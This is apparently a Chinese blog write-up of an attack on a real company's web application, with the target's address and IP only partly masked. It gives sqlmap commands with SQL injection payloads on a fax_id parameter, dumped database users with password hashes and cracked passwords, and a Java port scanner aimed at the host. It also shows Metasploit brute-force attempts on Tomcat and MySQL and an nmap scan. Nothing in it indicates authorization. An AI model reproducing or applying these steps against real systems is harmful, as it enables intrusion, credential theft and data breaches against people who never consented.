Sqlmap 渗透某集团
0x00 找到盲注点
参考链接http://bluereader.org/article/59585524
python sqlmap.py -u "http://www.*.net/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: fax_id (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: fax_id=1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,0x72514471566c4b56546f,0x71706a7871),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: fax_id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))dCsX) AND 'uYLq'='uYLq
---
available databases [3]:
[*] information_schema
[*] mysql
[*] mysql3235
0x01 查看数据库表和数据
python sqlmap.py -u "http://www.*.net/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1" --tables
就会得到数据库中的所有表,然后我随即抽了一个schedule表查看数据
python sqlmap.py -u "http://www.*.net/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1" --dump -T schedule
但是结果不如人意
[13:27:41] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
Database: mysql3235
Table: schedule
[0 entries]
+-------+---------+-----------+
| TITLE | ENDTIME | STARTTIME |
+-------+---------+-----------+
+-------+---------+-----------+
0x02 尝试爆破数据库密码
获取数据库用户
python sqlmap.py -u "http://www.*.net/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1" --users
database management system users [5]:
[*] ''@'localhost'
[*] 'cubetech'@'localhost'
[*] 'debugger'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
获取数据库密码
python sqlmap.py -u "http://www.*.net/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1" --users --passwords
database management system users password hashes:
[*] cubetech [1]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
clear-text password: 123456
[*] debugger [1]:
password hash: *6D45DF82DF6169868F43DD422AB3229D376BD1BE
clear-text password: debugger
[*] root [1]:
password hash: *1532B21FE550E115F113DAA9A26D0EEEEF8DEDC7
0x03 探索Mysql端口
知道了数据库用户名和端口后 我就尝试远程链接数据库了.ip很容易得到. 应该是服务器本身 .这样的服务器管理员应该是不会做服务器和数据库分离的 .
尝试了mysql的3306端口 失败!
写了个java扫描哪些端口开启…
import java.net.Socket;
import java.util.ArrayList;
import java.util.List;
public class Check_Open_Port {
public static void main(String args[]) {
final List<Integer> li = new ArrayList<Integer>();
for (int i = 0; i <= 65535; i++) {
li.add(i);
}
for (int i = 0; i <= 100; i++) {
new Thread() {
public void run() {
while (li.size() != 0) {
int li_get = 0;
int num = (int) Math.floor(Math.random()* (li.size()));
try {
li_get = li.get(num);
int num_remove_check =li.indexOf(li_get);
if(num_remove_check!=-1)
li.remove(num_remove_check);
Socket client = new Socket("122.233.243.***",
li_get);
System.out.println("端口 : " + li_get + "已开放");
client.close();
} catch (Exception e) {
System.out.println("端口 : " + li_get + "未开放");
}
}
}
}.start();
}
//检测ip有无被封锁 和当前集合个数
new Thread() {
public void run() {
while (li.size() != 0) {
try {
Socket client = new Socket("122.233.243.***", 80);
System.out.println("端口 : " + 80 + "已开放");
client.close();
} catch (Exception e) {
System.out.println("端口 : " + 80 + "未开放");
}
System.out.println("当前集合个数 : "+li.size());
try {
join(50000);
} catch (InterruptedException e) {
e.printStackTrace();
}
}
}
}.start();
}
}
扫了好久..结果发现没有扫到 原因有两个
其实扫到了 不过控制台信息太多了 把扫到的端口顶掉了 我应该把输出写到一个log里
就是并发线程没控制好.一个线程remove list数据的时候,另外一个线程已经remove了.然后数据在List的位置就会改变,导致漏了好多端口.我应该做线程锁,或者写map的 检查过就把value设成true.
好了扫描端口其实只是一个尝试,并没有太多技术含量.我决定要从Tomcat入手.尝试用metasploit破解Tomcat
0x04 metasploit 入侵Tomcat
终端输入
msfconsole
设置入侵Tomcat
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHoSTS 122.233.243.***
RHoSTS => 122.233.243.***
msf auxiliary(tomcat_mgr_login) > set RPORT 80
RPORT => 80
msf auxiliary(tomcat_mgr_login) > run
结果并没有破解出密码- -.
参考文章http://www.rising.com.cn/newsletter/news/2013-03-01/13256.html
0x05 再次尝试利用 metasploit 检测出 数据库端口
msf > nmap -Pn -sV 122.233.243.***
Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-19 23:05 CST
Nmap scan report for 122.233.243.***
Host is up (0.13s latency).
Not shown: 991 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache Tomcat/Coyote JSP engine 1.1
135/tcp closed msrpc
139/tcp closed netbios-ssn
593/tcp closed http-rpc-epmap
3389/tcp open ms-wbt-server Microsoft Terminal Service
4444/tcp closed krb524
6059/tcp open tcpwrapped
10000/tcp open snet-sensor-mgmt?
10010/tcp open rxapi?
Service Info: OS: Windows
好像并没有我们想得到的
0x06 穷途末路的我尝试了下mysql扫描
msf auxiliary(tomcat_mgr_login) > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set RHOSTS 122.233.243.***
RHOSTS => 122.233.243.***
msf auxiliary(mysql_login) > run
[-] 122.233.243.***:3306 MYSQL - Unable to connect: The connection timed out (122.233.243.***:3306).
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
其实傻子也知道不可以- -因为看了下info
扫的端口是3306 怎么可能可以….
参考链接http://www.bubuko.com/infodetail-343797.html
0x07 利用sql-shell查端口
show variables like 'port';
or
select * from global_variables where VARIABLE_NAME ='PORT';
上面2个命令都可以查询端口,但是global_variables表属于临时表,只在当前连接下显示,所以无法利用 但是还是想通过insert 插入到一个表中
python sqlmap.py -u "http://www.*.net/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1" --sql-shell "SELECT 'global_variables'" -v 5
insert into hr_event(name) select VARIABLE_NAME from information_schema.global_variables where VARIABLE_NAME ='PORT';
[02:46:34] [WARNING] execution of custom SQL queries is only available when stacked queries are supported
通过sqlmap执行的sql-shell只能执行简单的查询,所以此法无效